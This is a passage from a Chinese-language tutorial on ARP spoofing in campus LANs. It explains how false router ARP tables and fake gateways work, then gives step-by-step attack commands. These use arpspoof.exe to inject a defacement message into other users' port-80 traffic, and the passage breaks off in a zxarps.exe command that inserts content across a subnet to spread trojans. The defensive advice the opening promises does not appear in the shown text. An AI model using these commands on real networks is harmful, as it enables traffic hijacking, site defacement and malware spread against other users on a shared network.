近期一种新型的“地址解析协议欺骗”(简称:ARP欺骗)攻击手段正在校园网中扩散,严重影响了包括校园网的各种类型局域网的正常运行。黑客通过伪造一个假的网关进行木马的散播,让局域网内的用户一上网就会连接有木马的地址,而用户唯一的感觉只是网络不畅通。那么ARP 欺骗是怎样的一种黑客攻击手段?普通的用户又该如何防范ARP 欺骗攻击呢?“ARP 欺骗”的方式和原理从影响网络连接通畅的方式来看,ARP 欺骗大概可以分为两种。一种是对路由器ARP表的欺骗,这种方法可以破坏系统的ARP缓存表,从而造成内外IP地址的混乱。另一种是对局域网里面计算机的网关欺骗,让内网计算机系统的数据包通过假网关来发送。第一种ARP 欺骗的原理是截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行地址的更换,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,从而造成计算机访问黑客精心构建的网络陷阱。第二种ARP 欺骗的原理是伪造网关。它的原理是建立假网关,让被它欺骗的计算机向假网关发数据,而不是通过正常的路由器途径上网。在用户的角度看来,就是上不了网了以及网络掉线了,这样会给用户造成系统网关出错的假象。如何利用“ARP 欺骗”入侵黑客要进行ARP 欺骗入侵只需要一个前提条件,就是进行入侵的计算机和被攻击的计算机要在一个局域网的网段中。tw.wingWit.CoM由于ARP 欺骗是通过数据包进行欺骗的,所以在进行操作以前要在本地计算机安装一个驱动程序WinPcap(图1)。打开系统的命令提示符命令,并切换到利用工具所在的目录,接着执行利用工具命令:arpspoof.exe /n,然后会生成一个文本文件。现在打开这个文本文件后按照自己的需求进行编辑,比如可以将“Hack by cooldiyer”改为“该系统已经被我成功入侵!”(图2)。在命令提示符窗口输入命令:ArpSpoof 192.168.1.6 192.168.1.3 80 2 1 /r job.txt,其中192.168.1.6表示入侵计算机的IP地址,192.168.1.3表示被入侵计算机的IP地址,80表示用于欺骗的远程端口。后面的相关参数设置,用户应该根据自己网络网关的实际类型(例如有些网关地址为192.168.0.1,有些则是192.168. 110.1)情况进行设置。当准确键入以上命令后回车,程序就可以进行ARP 欺骗攻击(图3)。当其他用户访问这台服务器的80端口后,从浏览器看到的就是我们文本文件中的内容。刚才只是利用ARP 欺骗进行了网站攻击,现在利用另一款欺骗工具进行木马传播。在命令提示符窗口查看ARP 欺骗工具zxarps.exe的使用方法,然后键入命令:zxarps.exe -idx 0 -ip 192.168.1.7-192.168. 1.255 -port 80 -insert “